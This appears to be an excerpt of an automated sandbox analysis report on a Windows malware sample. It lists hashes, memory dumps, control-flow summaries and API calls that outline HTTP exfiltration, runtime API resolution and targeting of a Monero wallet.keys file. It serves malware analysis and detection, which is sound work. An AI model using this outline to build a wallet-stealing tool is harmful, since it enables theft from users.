                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 5bdb416adfaccafb515cdd379fdc3029ad31caeb4f925ed6811209701354cdbc
                            • Instruction ID: b868767ec7049430527c2c3ba3005e9834e9a5aa08bbe00619f850c738251224
                            • Opcode Fuzzy Hash: 5bdb416adfaccafb515cdd379fdc3029ad31caeb4f925ed6811209701354cdbc
                            • Instruction Fuzzy Hash: 154147616DA6046BEE24B7B5C842EAD7BD7FF4370AF507140EF0062296DBB065086722
                            Function 00564880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 564880-564942 call 57a7a0 call 5647b0 call 57a740 * 5 InternetOpenA StrCmpCA 816 564944 801->816 817 56494b-56494f 801->817 816->817 818 564955-564acd call 578b60 call 57a920 call 57a8a0 call 57a800 * 2 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a920 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a920 call 57a8a0 call 57a800 * 2 InternetConnectA 817->818 819 564ecb-564ef3 InternetCloseHandle call 57aad0 call 569ac0 817->819 818->819 905 564ad3-564ad7 818->905 829 564ef5-564f2d call 57a820 call 57a9b0 call 57a8a0 call 57a800 819->829 830 564f32-564fa2 call 578990 * 2 call 57a7a0 call 57a800 * 8 819->830 829->830 906 564ae5 905->906 907 564ad9-564ae3 905->907 908 564aef-564b22 HttpOpenRequestA 906->908 907->908 909 564ebe-564ec5 InternetCloseHandle 908->909 910 564b28-564e28 call 57a9b0 call 57a8a0 call 57a800 call 57a920 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a920 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a920 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a9b0 call 57a8a0 call 57a800 call 57a920 call 57a8a0 call 57a800 call 57a740 call 57a920 * 2 call 57a8a0 call 57a800 * 2 call 57aad0 lstrlen call 57aad0 * 2 lstrlen call 57aad0 HttpSendRequestA 908->910 909->819 1021 564e32-564e5c InternetReadFile 910->1021 1022 564e67-564eb9 InternetCloseHandle call 57a800 1021->1022 1023 564e5e-564e65 1021->1023 1022->909 1023->1022 1024 564e69-564ea7 call 57a9b0 call 57a8a0 call 57a800 1023->1024 1024->1021
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00564915
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 0056493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00564ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00580DDB,00000000,?,?,00000000,?,",00000000,?,00E4EAA8), ref: 00564DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00564E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00564E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00564E49
                            • InternetCloseHandle.WININET(00000000), ref: 00564EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00564EC5
                            • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00564B15
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • InternetCloseHandle.WININET(00000000), ref: 00564ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 1df7491c619ca770580d0d6d09644aba92945e69544006cabc6ada730d8cf9f2
                            • Instruction ID: 2a60bf4b31664fd55cc2b181af74415aa771b644e4f2bfb0e0add6b9a89d4867
                            • Opcode Fuzzy Hash: 1df7491c619ca770580d0d6d09644aba92945e69544006cabc6ada730d8cf9f2
                            • Instruction Fuzzy Hash: EA12FF72910119AADB15EB60EC56FEEBB38BFD4300F508199B11A72091EF702F49DF66
                            Function 00577850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005611B7), ref: 00577880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0057789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: b8f54c7f31bd570804c6185961dfd101519d93368334311540c1f32e54e6c771
                            • Instruction ID: ac0be2ba71519fbe33314f70b60aa4caef234386eb5a2fd568a5a205709204cf
                            • Opcode Fuzzy Hash: b8f54c7f31bd570804c6185961dfd101519d93368334311540c1f32e54e6c771
                            • Instruction Fuzzy Hash: 41F044B1944209ABC700DF94DD45FAEBBB8FB45711F104559F605A2680C7781504CBA1
                            Function 00561160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 78ab230d7e2f7238b4384d410f17b71447d4cc282f17c98571a2bc54a50e0c72
                            • Instruction ID: 2fd9e3cd0d82286d9cc6bb4ba6bd7f23c965eba37c4ba0aab4d0592ae4362e18
                            • Opcode Fuzzy Hash: 78ab230d7e2f7238b4384d410f17b71447d4cc282f17c98571a2bc54a50e0c72
                            • Instruction Fuzzy Hash: 0CD05E7490030CEBCB40DFE0D8496EEBB78FB49311F000554D90562340EB305881CBAA
                            Function 00579C10 Relevance: 224.7, APIs: 112, Strings: 16, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 579c10-579c1a 634 57a036-57a0ca LoadLibraryA * 8 633->634 635 579c20-57a031 GetProcAddress * 43 633->635 636 57a146-57a14d 634->636 637 57a0cc-57a141 GetProcAddress * 5 634->637 635->634 638 57a216-57a21d 636->638 639 57a153-57a211 GetProcAddress * 8 636->639 637->636 640 57a21f-57a293 GetProcAddress * 5 638->640 641 57a298-57a29f 638->641 639->638 640->641 642 57a337-57a33e 641->642 643 57a2a5-57a332 GetProcAddress * 6 641->643 644 57a344-57a41a GetProcAddress * 9 642->644 645 57a41f-57a426 642->645 643->642 644->645 646 57a4a2-57a4a9 645->646 647 57a428-57a49d GetProcAddress * 5 645->647 648 57a4dc-57a4e3 646->648 649 57a4ab-57a4d7 GetProcAddress * 2 646->649 647->646 650 57a515-57a51c 648->650 651 57a4e5-57a510 GetProcAddress * 2 648->651 649->648 652 57a612-57a619 650->652 653 57a522-57a60d GetProcAddress * 10 650->653 651->650 654 57a67d-57a684 652->654 655 57a61b-57a678 GetProcAddress * 4 652->655 653->652 656 57a686-57a699 GetProcAddress 654->656 657 57a69e-57a6a5 654->657 655->654 656->657 658 57a6a7-57a703 GetProcAddress * 4 657->658 659 57a708-57a709 657->659 658->659
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00E35830), ref: 00579C2D
                            • GetProcAddress.KERNEL32(74DD0000,00E35950), ref: 00579C45
                            • GetProcAddress.KERNEL32(74DD0000,00E496A0), ref: 00579C5E
                            • GetProcAddress.KERNEL32(74DD0000,00E496B8), ref: 00579C76
                            • GetProcAddress.KERNEL32(74DD0000,00E49640), ref: 00579C8E
                            • GetProcAddress.KERNEL32(74DD0000,00E496D0), ref: 00579CA7
                            • GetProcAddress.KERNEL32(74DD0000,00E3B748), ref: 00579CBF
                            • GetProcAddress.KERNEL32(74DD0000,00E4D2D8), ref: 00579CD7
                            • GetProcAddress.KERNEL32(74DD0000,00E4D110), ref: 00579CF0
                            • GetProcAddress.KERNEL32(74DD0000,00E4D128), ref: 00579D08
                            • GetProcAddress.KERNEL32(74DD0000,00E4D368), ref: 00579D20
                            • GetProcAddress.KERNEL32(74DD0000,00E35750), ref: 00579D39
                            • GetProcAddress.KERNEL32(74DD0000,00E358D0), ref: 00579D51
                            • GetProcAddress.KERNEL32(74DD0000,00E35990), ref: 00579D69
                            • GetProcAddress.KERNEL32(74DD0000,00E35710), ref: 00579D82
                            • GetProcAddress.KERNEL32(74DD0000,00E4D1E8), ref: 00579D9A
                            • GetProcAddress.KERNEL32(74DD0000,00E4D200), ref: 00579DB2
                            • GetProcAddress.KERNEL32(74DD0000,00E3B888), ref: 00579DCB
                            • GetProcAddress.KERNEL32(74DD0000,00E359B0), ref: 00579DE3
                            • GetProcAddress.KERNEL32(74DD0000,00E4D218), ref: 00579DFB
                            • GetProcAddress.KERNEL32(74DD0000,00E4D140), ref: 00579E14
                            • GetProcAddress.KERNEL32(74DD0000,00E4D2C0), ref: 00579E2C
                            • GetProcAddress.KERNEL32(74DD0000,00E4D1D0), ref: 00579E44
                            • GetProcAddress.KERNEL32(74DD0000,00E356F0), ref: 00579E5D
                            • GetProcAddress.KERNEL32(74DD0000,00E4D380), ref: 00579E75
                            • GetProcAddress.KERNEL32(74DD0000,00E4D2F0), ref: 00579E8D
                            • GetProcAddress.KERNEL32(74DD0000,00E4D1B8), ref: 00579EA6
                            • GetProcAddress.KERNEL32(74DD0000,00E4D3E0), ref: 00579EBE
                            • GetProcAddress.KERNEL32(74DD0000,00E4D230), ref: 00579ED6
                            • GetProcAddress.KERNEL32(74DD0000,00E4D398), ref: 00579EEF
                            • GetProcAddress.KERNEL32(74DD0000,00E4D308), ref: 00579F07
                            • GetProcAddress.KERNEL32(74DD0000,00E4D188), ref: 00579F1F
                            • GetProcAddress.KERNEL32(74DD0000,00E4D0F8), ref: 00579F38
                            • GetProcAddress.KERNEL32(74DD0000,00E4A960), ref: 00579F50
                            • GetProcAddress.KERNEL32(74DD0000,00E4D320), ref: 00579F68
                            • GetProcAddress.KERNEL32(74DD0000,00E4D248), ref: 00579F81
                            • GetProcAddress.KERNEL32(74DD0000,00E35A10), ref: 00579F99
                            • GetProcAddress.KERNEL32(74DD0000,00E4D338), ref: 00579FB1
                            • GetProcAddress.KERNEL32(74DD0000,00E358F0), ref: 00579FCA
                            • GetProcAddress.KERNEL32(74DD0000,00E4D260), ref: 00579FE2
                            • GetProcAddress.KERNEL32(74DD0000,00E4D3B0), ref: 00579FFA
                            • GetProcAddress.KERNEL32(74DD0000,00E35A30), ref: 0057A013
                            • GetProcAddress.KERNEL32(74DD0000,00E35E10), ref: 0057A02B
                            • LoadLibraryA.KERNEL32(00E4D3C8,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A03D
                            • LoadLibraryA.KERNEL32(00E4D158,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A04E
                            • LoadLibraryA.KERNEL32(00E4D278,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A060
                            • LoadLibraryA.KERNEL32(00E4D170,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A072
                            • LoadLibraryA.KERNEL32(00E4D350,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A083
                            • LoadLibraryA.KERNEL32(00E4D1A0,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A095
                            • LoadLibraryA.KERNEL32(00E4D290,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A0A7
                            • LoadLibraryA.KERNEL32(00E4D2A8,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A0B8
                            • GetProcAddress.KERNEL32(75290000,00E35DF0), ref: 0057A0DA
                            • GetProcAddress.KERNEL32(75290000,00E4D578), ref: 0057A0F2
                            • GetProcAddress.KERNEL32(75290000,00E49218), ref: 0057A10A
                            • GetProcAddress.KERNEL32(75290000,00E4D440), ref: 0057A123
                            • GetProcAddress.KERNEL32(75290000,00E35BD0), ref: 0057A13B
                            • GetProcAddress.KERNEL32(734C0000,00E3B7C0), ref: 0057A160
                            • GetProcAddress.KERNEL32(734C0000,00E35CB0), ref: 0057A179
                            • GetProcAddress.KERNEL32(734C0000,00E3B928), ref: 0057A191
                            • GetProcAddress.KERNEL32(734C0000,00E4D4D0), ref: 0057A1A9
                            • GetProcAddress.KERNEL32(734C0000,00E4D5A8), ref: 0057A1C2
                            • GetProcAddress.KERNEL32(734C0000,00E35D30), ref: 0057A1DA
                            • GetProcAddress.KERNEL32(734C0000,00E35C90), ref: 0057A1F2
                            • GetProcAddress.KERNEL32(734C0000,00E4D4A0), ref: 0057A20B
                            • GetProcAddress.KERNEL32(752C0000,00E35E30), ref: 0057A22C
                            • GetProcAddress.KERNEL32(752C0000,00E35DB0), ref: 0057A244
                            • GetProcAddress.KERNEL32(752C0000,00E4D3F8), ref: 0057A25D
                            • GetProcAddress.KERNEL32(752C0000,00E4D488), ref: 0057A275
                            • GetProcAddress.KERNEL32(752C0000,00E35B10), ref: 0057A28D
                            • GetProcAddress.KERNEL32(74EC0000,00E3B860), ref: 0057A2B3
                            • GetProcAddress.KERNEL32(74EC0000,00E3B9F0), ref: 0057A2CB
                            • GetProcAddress.KERNEL32(74EC0000,00E4D548), ref: 0057A2E3
                            • GetProcAddress.KERNEL32(74EC0000,00E35D70), ref: 0057A2FC
                            • GetProcAddress.KERNEL32(74EC0000,00E35B30), ref: 0057A314
                            • GetProcAddress.KERNEL32(74EC0000,00E3B950), ref: 0057A32C
                            • GetProcAddress.KERNEL32(75BD0000,00E4D410), ref: 0057A352
                            • GetProcAddress.KERNEL32(75BD0000,00E35B70), ref: 0057A36A
                            • GetProcAddress.KERNEL32(75BD0000,00E491A8), ref: 0057A382
                            • GetProcAddress.KERNEL32(75BD0000,00E4D500), ref: 0057A39B
                            • GetProcAddress.KERNEL32(75BD0000,00E4D428), ref: 0057A3B3
                            • GetProcAddress.KERNEL32(75BD0000,00E35CD0), ref: 0057A3CB
                            • GetProcAddress.KERNEL32(75BD0000,00E35DD0), ref: 0057A3E4
                            • GetProcAddress.KERNEL32(75BD0000,00E4D590), ref: 0057A3FC
                            • GetProcAddress.KERNEL32(75BD0000,00E4D470), ref: 0057A414
                            • GetProcAddress.KERNEL32(75A70000,00E35C50), ref: 0057A436
                            • GetProcAddress.KERNEL32(75A70000,00E4D4E8), ref: 0057A44E
                            • GetProcAddress.KERNEL32(75A70000,00E4D4B8), ref: 0057A466
                            • GetProcAddress.KERNEL32(75A70000,00E4D518), ref: 0057A47F
                            • GetProcAddress.KERNEL32(75A70000,00E4D530), ref: 0057A497
                            • GetProcAddress.KERNEL32(75450000,00E35C30), ref: 0057A4B8
                            • GetProcAddress.KERNEL32(75450000,00E35AD0), ref: 0057A4D1
                            • GetProcAddress.KERNEL32(75DA0000,00E35B50), ref: 0057A4F2
                            • GetProcAddress.KERNEL32(75DA0000,00E4D560), ref: 0057A50A
                            • GetProcAddress.KERNEL32(6F070000,00E35D50), ref: 0057A530
                            • GetProcAddress.KERNEL32(6F070000,00E35BF0), ref: 0057A548
                            • GetProcAddress.KERNEL32(6F070000,00E35D90), ref: 0057A560
                            • GetProcAddress.KERNEL32(6F070000,00E4D458), ref: 0057A579
                            • GetProcAddress.KERNEL32(6F070000,00E35B90), ref: 0057A591
                            • GetProcAddress.KERNEL32(6F070000,00E35CF0), ref: 0057A5A9
                            • GetProcAddress.KERNEL32(6F070000,00E35D10), ref: 0057A5C2
                            • GetProcAddress.KERNEL32(6F070000,00E35E50), ref: 0057A5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0057A5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0057A607
                            • GetProcAddress.KERNEL32(75AF0000,00E4CE40), ref: 0057A629
                            • GetProcAddress.KERNEL32(75AF0000,00E49278), ref: 0057A641
                            • GetProcAddress.KERNEL32(75AF0000,00E4CFC0), ref: 0057A659
                            • GetProcAddress.KERNEL32(75AF0000,00E4CEA0), ref: 0057A672
                            • GetProcAddress.KERNEL32(75D90000,00E35AB0), ref: 0057A693
                            • GetProcAddress.KERNEL32(6E400000,00E4CED0), ref: 0057A6B4
                            • GetProcAddress.KERNEL32(6E400000,00E35AF0), ref: 0057A6CD
                            • GetProcAddress.KERNEL32(6E400000,00E4D098), ref: 0057A6E5
                            • GetProcAddress.KERNEL32(6E400000,00E4CEB8), ref: 0057A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
